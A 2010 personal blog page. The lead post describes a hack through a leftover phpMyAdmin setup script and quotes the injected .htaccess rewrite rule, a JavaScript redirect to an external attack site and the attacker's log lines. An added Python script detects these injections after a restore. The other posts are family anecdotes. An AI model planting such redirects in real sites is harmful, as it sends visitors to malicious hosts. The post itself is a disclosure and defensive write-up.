Oct 17 2010

I've been hacked!

Today – at 4:26pm (server time) my site was hacked.

 All pages on the site were redirecting to http://webarh.com/z.php (don't go there – it's an attack site – the buggers.)

 After trying to figure out how they got in – I found that my server (which is a VPS) has PhpMySQL installed as a default in apache to attach to the alias of /myadmin.  They (the hackors/bot/whatev) attached through a BASIC DEFAULT INSTALL SCRIPT THE MORONS LEFT OPEN.  There.  I feel a bit better.

Okay – I've removed the GAPING WIDE HOLE in my server by removing the unwanted application and restored the site from backups.  Since it's only been hijacked for just under four hours, I am hoping not too many people have been affected (mainly the search bots which will tag the site as infected).

I really can't believe that the installation script was left after the system admins made the image for my VPS.  Really dumb.  As a user of the hosting – I wasn't even aware that the addition of an apache alias was even installed.  I've been hacked because of my own stupidity before – and I find it annoying – but being hacked because of someone else's mistake is extremely aggravating. 

The final attack updated all .htaccess files to include:

RewriteEngine On
RewriteBase /
RewriteRule ^(.*)? http://webarh.com/z.php

 

And they inserted the following in the base of the index.php and index.html files for each folder:

<script>document.location.href='http://webarh.com/z.php';</script>

 

The log files show a single GET and then POST to the file:

174.129.214.209 - - [17/Oct/2010:16:26:38 -0400] "GET /myadmin/scripts/setup.php HTTP/1.1" 200 14060 "-" "-"
174.129.214.209 - - [17/Oct/2010:16:26:38 -0400] "POST /myadmin/scripts/setup.php HTTP/1.1" 200 - "-" "-"
 

That's it.  That's the hacker.   The host manager has been notified.
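
An added example, not part of the original post: a small Python check that walks a web root after a restore and flags any .htaccess rule or index-page script that still redirects to an external host, generalized from the two injections shown above. The function names, the allow-list parameter and the sample tree are assumptions constructed for illustration.

```python
import os
import re
import tempfile

# .htaccess rule whose substitution is an absolute external URL, as in the post.
HTACCESS_REDIRECT = re.compile(r"^\s*RewriteRule\s+\S+\s+(https?://\S+)", re.I | re.M)
# Inline script that immediately navigates the page elsewhere, as in the post.
SCRIPT_REDIRECT = re.compile(
    r"<script[^>]*>\s*(?:document\.|window\.)?location(?:\.href)?"
    r"\s*=\s*['\"](https?://[^'\"]+)['\"]", re.I)
INDEX_NAMES = {"index.php", "index.html", "index.htm"}


def scan_webroot(root, allowed_hosts=()):
    """Return sorted (relative path, redirect URL) pairs for suspicious files."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name == ".htaccess":
                pattern = HTACCESS_REDIRECT
            elif name.lower() in INDEX_NAMES:
                pattern = SCRIPT_REDIRECT
            else:
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            for url in pattern.findall(text):
                host = re.sub(r"^https?://", "", url, flags=re.I).split("/")[0].lower()
                if host not in allowed_hosts:  # skip redirects you set up yourself
                    findings.append((os.path.relpath(path, root).replace(os.sep, "/"), url))
    return sorted(findings)


def demo(allowed_hosts=()):
    """Constructed sample tree: injected files at the top level, a clean subfolder."""
    samples = {
        ".htaccess": "RewriteEngine On\nRewriteBase /\nRewriteRule ^(.*)? http://webarh.com/z.php\n",
        "index.php": "<?php echo 'home'; ?>\n<script>document.location.href='http://webarh.com/z.php';</script>\n",
        "blog/.htaccess": "RewriteEngine On\nRewriteRule ^old$ /new [R=301,L]\n",
        "blog/index.html": "<html><body>clean</body></html>\n",
    }
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "blog"))
        for rel, body in samples.items():
            with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_webroot(root, allowed_hosts)
```

Run `scan_webroot` against the real document root after restoring from backup; an empty list means neither injection pattern is still present in those file types.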

 


Oct 10 2010

It gets better….? !


Oct 8 2010

A journey for a lost friend


Sep 28 2010

Cameron's first Coke

 Michelle and I haven't let Cameron (or Nate) have soft drinks. We don't
think they need that much sugar so young. We've told Cameron he was
allowed to have some on his third birthday. We gave him maybe a quarter
of a can with his dinner. His brother wanted to have pop too, so we
gave him some plain soda water – comes from a can and has bubbles – but
no sugar. He is off camera and doesn't like it ;)

 


Sep 24 2010

Grace


Sep 12 2010

To end the controversy…

Okay – to explain the previous images of Nate's eye and how he managed to give himself a shiner.

We were at the Mall and the boys were being pretty good, so Michelle thought it would be nice if they got a treat.  On the way out she thought it would be nice if they had a ride on the coin operated rides.  The rides are located on a raised platform in the middle of the mall hallway.

When Mic mentioned it to the boys, they ran for the rides in excitement.  Nate either missed the step, or completely ignored it.  Either way – he tripped over the edge and landed face-first on the platform.  He let out an immediate scream and by the time I got to him his eye had already swelled to the size of a small marble.

Now… to settle a personal argument… the size of the platform…


Sep 11 2010

The Empathic Civilization


Sep 9 2010

Way too much eye shadow kid.


Sep 6 2010

Nate just doesn't listen.


Aug 24 2010

I don't want directions…